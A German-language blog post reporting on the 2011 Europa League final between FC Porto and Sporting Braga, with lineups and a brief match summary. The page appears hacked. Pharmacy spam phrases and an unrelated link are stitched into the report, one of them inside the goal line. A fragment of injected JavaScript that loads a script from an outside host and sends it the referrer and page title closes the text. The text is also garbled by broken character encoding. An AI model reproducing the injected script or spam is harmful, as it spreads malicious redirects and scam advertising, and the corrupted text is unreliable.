Willkommen auf » EL 2010/11 Highlights FC Porto – Sporting Braga
19. Mai 2011

EL 2010/11 Highlights FC Porto – Sporting Braga

Europa League 2010/11 Finale
FC Porto – Sporting Braga 1:0

1:0 Cheap Pills Radamel Falcao (44., Kopfball, Vorlage Guarin)
vor 47.000 Zuschauern im Aviva-Stadium in Dublin

Aufstellung Porto: Helton – Sapunaru, Rolando, Otamendi, Alvaro Pereira – Fernando – Guarin (73. Belluschi), Joao Moutinho – Hulk, Silvestre Varela (79. James Rodriguez) – Falcao

Aufstellung Braga: Artur – Miguel Garcia, Paulao, Rodriguez (46. Kaka), Silvio – Custodio, Vandinho – Hugo Viana (46. Marcio Mossoro) – Alan, Paulo Cesar – Lima (66. Meyong)

Die Zusammenfassung des Spiels…
Order nexium lawsuit online Purchase order clarina english subscheap pills
AuAYerdem auch hier purchase yougaramdewbaba http://es-home.ch/2018/03/19/shingles-pain-treatment-neurontin/ , hier Cheap und cheapest tadacip online how much lithium orotate should i take hier zu sehen

Ein eher unspektakulA�res rein portugiesisches Europa League Finale mit einem verdienten FC Porto als Sieger. Sie investierten A?ber 90 Minuten deutlich mehr ins Spiel und brachten Braga A�fter unter BedrA�ngnis. Die hielten mit zum Teil grenzwertiger HA�rte dagegen (5 Gelbe Karten), blieben jedoch fA?r einen Finalisten erschreckend harmlos im Spiel nach vorn und versiebten die wenigen Torchancen, die sie sich erarbeiteten, auch noch A�uAYerst klA�glich. So konnte Portos MittelstA?rmer Falcao kurz vor der Halbzeit zum einzigen und entscheidenden Tor des Abends einkA�pfen (er kommt damit auf unglaubliche 17 Europapokaltore in dieser Saison, Rekord!).

FA?r Porto ist es der fA?nfte groAYe europA�ische Titel nach den Champions League Siegen 1987 und 2004, dem Erfolg im UEFA-Cup 2003 und dem UEFA Super Cup 1987.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “;


Einen Kommentar schreiben